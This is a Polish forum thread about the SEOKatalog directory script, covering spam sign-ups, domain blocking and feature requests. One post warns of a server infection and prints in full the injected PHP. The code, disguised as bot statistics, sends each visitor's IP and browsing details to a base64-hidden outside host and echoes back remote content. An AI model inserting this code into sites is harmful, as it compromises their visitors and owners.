Skocz do zawartości

[startup] SEOKatalog

Rekomendowane odpowiedzi

Pewnie dlatego że zaktualizowałeś katalog do nowej wersji ale nie wprowadziłeś w templatce obowiązkowych zmian w pliku readme_update-polish.txt

iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku.

jakby kogoś interesowała sprawa z wirusem, po włamaniu na serwer ftp modyfikuje każdy plik 'index.php' (home i footer też spotkałem podmienione) i dodaje tam ten kod :

<?php	
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
	if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics			
	$stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
		$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
curl_close($stCurlHandle); 
}
?>

Z przeszłości zostały jeszcze: Katalog Turystyczny, s3zow.pl
Blog o pozycjonowaniu i optymalizacji prowadzę pod adresem: https://zeid.pl

Przydało by się blokowanie całej domeny e-mail mam takich jednych delikwentów co zakładają konta seo142@prm-------ment.pl ( na swojej domenie) leca dublikatami 100% towymi ;), lecą prze proxy , jeśli by była taka możliwość to zbanowałem by cala domenę w email i był by spokój

Racja, wiem o czym mówisz, blokowanie całej domeny e-mail było by spoko opcją. Im więcej zabezpieczeń/blokad dla spamerów tym lepiej.

Agencja SEO z Katowic Intoseo - Pozycjonowanie Katowice
Wynajem myjek przemysłowych i warsztatowych - www.myjki360.pl

Dywaniki samochodowe https://topdywaniki.pl/

Przydało by się blokowanie całej domeny e-mail mam takich jednych delikwentów co zakładają konta seo142@prm-------ment.pl ( na swojej domenie) leca dublikatami 100% towymi ;), lecą prze proxy , jeśli by była taka możliwość to zbanowałem by cala domenę w email i był by spokój
a jest możliwość wprowadzenia poprawki, aby można było dodawać adresy z protokołem https?

Aż dziwne że tak proste ułatwienia nie zostały zaproponowane wcześniej - właśnie dorobiłem w roboczej 1.5. Wielki dzięki :)

Edytowane przez General_Depet

iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku.

Nie ma takiej opcji - już to wielokrotnie pisałem że to trochę bez sensu bo z poziomu phpa możesz jedynie sprawdzać czy strona zwraca cokolwiek w nagłówku ale już np. sytuacji gdy pod tą samą domeną jest już inna strona system nie wychwyci bo jak? Lepiej żeby to sami użytkownicy raportowali.

Ok rozumiem, choć nie do końca się zgadzam. Bo owszem czasem ktoś zaraportuje, ale bardzo rzadko. No nic pozostaje xenu od czasu do czasu.

Mam jeszcze jedno pytanie - czy bedzie możliwość ustawiania kolejności wyświetlania podkategorii? Bo losowo za bardzo mi nie odpowiada, a alfabetycznie też nie ;)

W czasie dzisiejszej moderacji wpadły mi do głowy dwa pomysły:

1) Możliwość zablokowania dodawania w opisie strony linków do strony głównej (czyli takich samych jak jest dodawana strona)

2) Zablokowanie wstawiania linków do innych stron (często ludzie dają w opisie linki do innych domen/podlinkowują wpisy itp)

Web Systems: strony www, ecommerce, integracje, marketing internetowy...

Jakoś na początku przeoczyłem zmianę struktury linków - czy jest sens teraz zmieniać strukturę, gdy katalog jest już trochę w sieci i ma sporo wpisów? Jeżeli tak to zastosować przekierowanie 301 z starych na nowe linki? Tylko jak to fajnie rozwiązać, aby nie było setek tysięcy kombinacji.

Tylko czy jest sens?